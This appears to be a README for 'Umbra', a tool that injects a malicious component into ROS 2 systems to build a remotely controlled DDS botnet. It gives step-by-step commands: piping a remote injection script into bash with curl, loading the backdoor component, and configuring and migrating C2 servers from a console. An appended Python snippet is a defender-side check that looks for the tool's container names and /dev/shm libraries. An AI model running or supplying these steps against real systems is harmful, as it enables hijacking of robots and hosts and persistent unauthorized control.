ROS 2 protocol vulnerability: remote malicious component injection tool
Outlines security flaws such as cross-subnet communication limits and container-component privilege control defects. The core objective of the reported work is to exploit these vulnerabilities to construct a DDS botnet capable of remotely controlling multiple ROS 2 nodes, achieving persistent control and privilege escalation on target ROS 2 hosts.
Details: Umbra_Report_XX.pdf
Does not depend on a ROS 2 environment.
If you and the targets are on the same LAN, you can deploy it on your own host.

$ ./umbra_poisoner

The poisoner must use the --c2 <IP>:<PORT> argument to connect to the controller.

$ ./umbra_console

Records the number of ROS nodes deployed in the target LAN.

$ ./umbra_loger

- Initialize the malicious component into a normal ROS 2 system.

PS: in the exploit directory there is injection_xxxxx.sh

(Ubuntu-192.168.0.113)$ curl http://server/injection_xxxxx.sh | bash
(Ubuntu-192.168.0.113)$ ros2 component list

- Locally register the malicious component (can be remote provided both Ubuntus have ROS 2 installed)

(Ubuntu-192.168.0.113)$ source /dev/shm/umbra_backdoor_install/setup.bash; \
ros2 component load /UMBRA_192_168_0_113 umbra_backdoor umbra --node-name injection

- Launch the umbra_console controller

(Arch-192.168.0.112)$ ./umbra_console

- Launch the umbra_loger logger

(Arch-192.168.0.112)$ ./umbra_loger

- Launch the umbra_poisoner poisoner

(Arch-192.168.0.112)$ ./umbra_poisoner --c2 192.168.0.112:7010

- In the controller, enter the session, configure the node settings and connect to the C2

Umbra# use 959145908c4f64af8292392d692b5669
Umbra[959145908c4f64af8292392d692b5669]# show
Umbra[959145908c4f64af8292392d692b5669]# set HC2F 192.168.0.112:7010
Umbra[959145908c4f64af8292392d692b5669]# set HC2S 192.168.0.112:443
Umbra[959145908c4f64af8292392d692b5669]# run
- Update commands to migrate the node to another C2 host
Umbra[959145908c4f64af8292392d692b5669]# set HC2S xxxxx:xxxxx
Umbra[959145908c4f64af8292392d692b5669]# run
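
A defender-side check for the artifacts the steps above leave on a ROS 2 host, as an added example that is not part of the Umbra project: it parses `ros2 component list` output for the `/UMBRA_<ip>` container name and flags shared objects mapped from `/dev/shm`. The sample output, the sample paths, the helper names and the assumption that the component library is loaded from the `/dev/shm` install prefix are constructed here, and a renamed build would evade the name match.

```python
import re

# Indicators copied from the commands on this page; a renamed build evades them.
CONTAINER_RE = re.compile(r"^/UMBRA_(\d{1,3}(?:_\d{1,3}){3})$")
PACKAGE_HINT = "umbra_backdoor"

def parse_component_list(text):
    """Parse `ros2 component list` output into {container: [(id, node), ...]}."""
    containers, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():  # component row: "  <id>  <node name>"
            parts = line.split()
            if current is not None and len(parts) == 2 and parts[0].isdigit():
                containers[current].append((int(parts[0]), parts[1]))
        else:  # unindented line: container name
            current = line.strip()
            containers[current] = []
    return containers

def is_suspect_path(path):
    # Fast DDS keeps its own shared-memory segments in /dev/shm, so only
    # shared objects there are flagged, plus any path naming the package.
    name = path.rsplit("/", 1)[-1]
    in_shm_lib = path.startswith("/dev/shm/") and (name.endswith(".so") or ".so." in name)
    return in_shm_lib or PACKAGE_HINT in path

def find_indicators(component_list_text, mapped_paths=()):
    """mapped_paths: file paths the caller collected from /proc/<pid>/maps
    of the component container processes (assumed collection step)."""
    findings = []
    for container, nodes in parse_component_list(component_list_text).items():
        m = CONTAINER_RE.match(container)
        if m:
            findings.append({"kind": "container", "name": container,
                             "host": m.group(1).replace("_", "."),
                             "nodes": [n for _, n in nodes]})
    findings += [{"kind": "path", "name": p} for p in mapped_paths if is_suspect_path(p)]
    return findings

# Constructed samples: list output in the CLI's layout, and made-up map paths.
SAMPLE = "/ComponentManager\n  1  /talker\n  2  /listener\n/UMBRA_192_168_0_113\n  1  /injection\n"
SAMPLE_PATHS = ["/opt/ros/humble/lib/libtalker_component.so",
                "/dev/shm/fastrtps_port7411",
                "/dev/shm/umbra_backdoor_install/umbra_backdoor/lib/libumbra.so"]

if __name__ == "__main__":
    print(find_indicators(SAMPLE, SAMPLE_PATHS))
```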










